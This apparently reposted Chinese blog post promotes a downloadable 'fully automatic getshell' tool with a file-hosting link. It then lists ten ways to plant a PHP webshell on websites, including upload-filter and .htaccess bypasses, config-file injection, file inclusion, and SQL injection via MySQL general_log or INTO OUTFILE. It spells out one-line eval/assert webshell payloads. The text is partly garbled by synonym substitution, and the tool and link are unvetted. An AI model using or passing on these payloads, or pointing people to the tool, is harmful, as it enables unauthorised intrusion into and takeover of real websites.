火爆全网的全自动getshell工具,是一款快速方便进行webshell扫描的工具,不同于以前的getshell批量工具,它根据内置常见的exp漏洞、市面较的50多种exp,更好的检测网站漏洞、只要网站存在内置的exp漏洞,皆可通杀出来、且扫到的shell%99.9都是可以连接使用和一手的,这就方便我们更好的检测网站是否存在漏洞!
下载地址:https://e1.pcloud.link/publink/show?code=XZBhIYZ3naKX5vQWOJh8kP3WLAlQufFlg9y
1.应用文件上传破绽,找文件上传处想方法上传php文件。
一些网站在设置能够允许修正上传的文件类型则直接添加php
有时分会还有检测能否为php文件,能够经过文件名变形,大小写,双写等方式绕过,只需是黑名单的都比拟好绕过
很多cms还有.hatccess文件制止访问或者执行这个目录下的文件的状况
这种状况直接上传一个.hatccess文件掩盖这个,让其失效。
或者上传不重命名的话上传../../shell.php 传到其他不被限制访问的目录
或者找恣意文件删除破绽把.hatccess文件删除
2.找文件配置的中央写入php代码,普通都有过滤的,想方法绕过
过滤单引号的话能够用注释把上一个的内容注释掉 在下一个参数配置注入代码
效果如下
$conf_1 ='xx\';
$conf_2 = ';phpinfo();//'
这样就相当于
$conf_1 ='xx\';$conf_2 = ';
phpinfo();
php代码就能够执行了,防护比拟弱的话直接访问这个配置文件就能够getshell了。
防护比拟好制止访问配置文件时,就找包含这个配置文件的文件即可。
3.找有没有存在恣意文件包含的中央,本地包含的话直接上传php代码的图片,远程包含的话就在本人的效劳器上设置php代码文件
4.sql注入getshell 要晓得网站的绝对途径
办法一:应用设置mysql log为php文件,并设置途径到网站目录下,这样就能够把sql中执行的php语句插入的log中了
如:
SETglobal general_log='on';
SETglobalgeneral_log_file='D:/webshell/WWW/shell.php';#假如没有shell.php会自动创立
SELECT'<?php assert($_POST["cmd"]);?>';
办法二:
select "<?php phpinfo(); ?>" into outfile 'shell途径.php'
5.远程图片文件下载
有时分远程图片下载的时分,能够设置一下下载本人的php文件
如 本人效劳器上的文件1.php
<?php
echo "<?php phpinfo(); ?>";
?>
或者别的方式,让页面有php代码,假如不过滤后缀的话直接会下载这个php文件
6.zip解压getshell
这个再系统晋级或者插件装置的中央很多都有这个问题。上传shell.php在紧缩包中,上传系统晋级时会解紧缩,那么就能够getshell
7.缓存写入
有些中央会把缓存写入到一个php文件里,想方法让本人的payload写入缓存中
8.数据库备份getshell
有些提供功用能够经过数据库备份停止修正文件后缀。
9.编辑模板getshell
在网站编辑模板插入一句话
10.命令执行拿webshell
echo <?php @eval($_POST(a));?> >途径.php
能够用相对途径也能够用绝对途径
标签:文件,getshell,shell,能够,全网,php,上传,全自动 From: https://www.cnblogs.com/luotianhe/p/17104815.html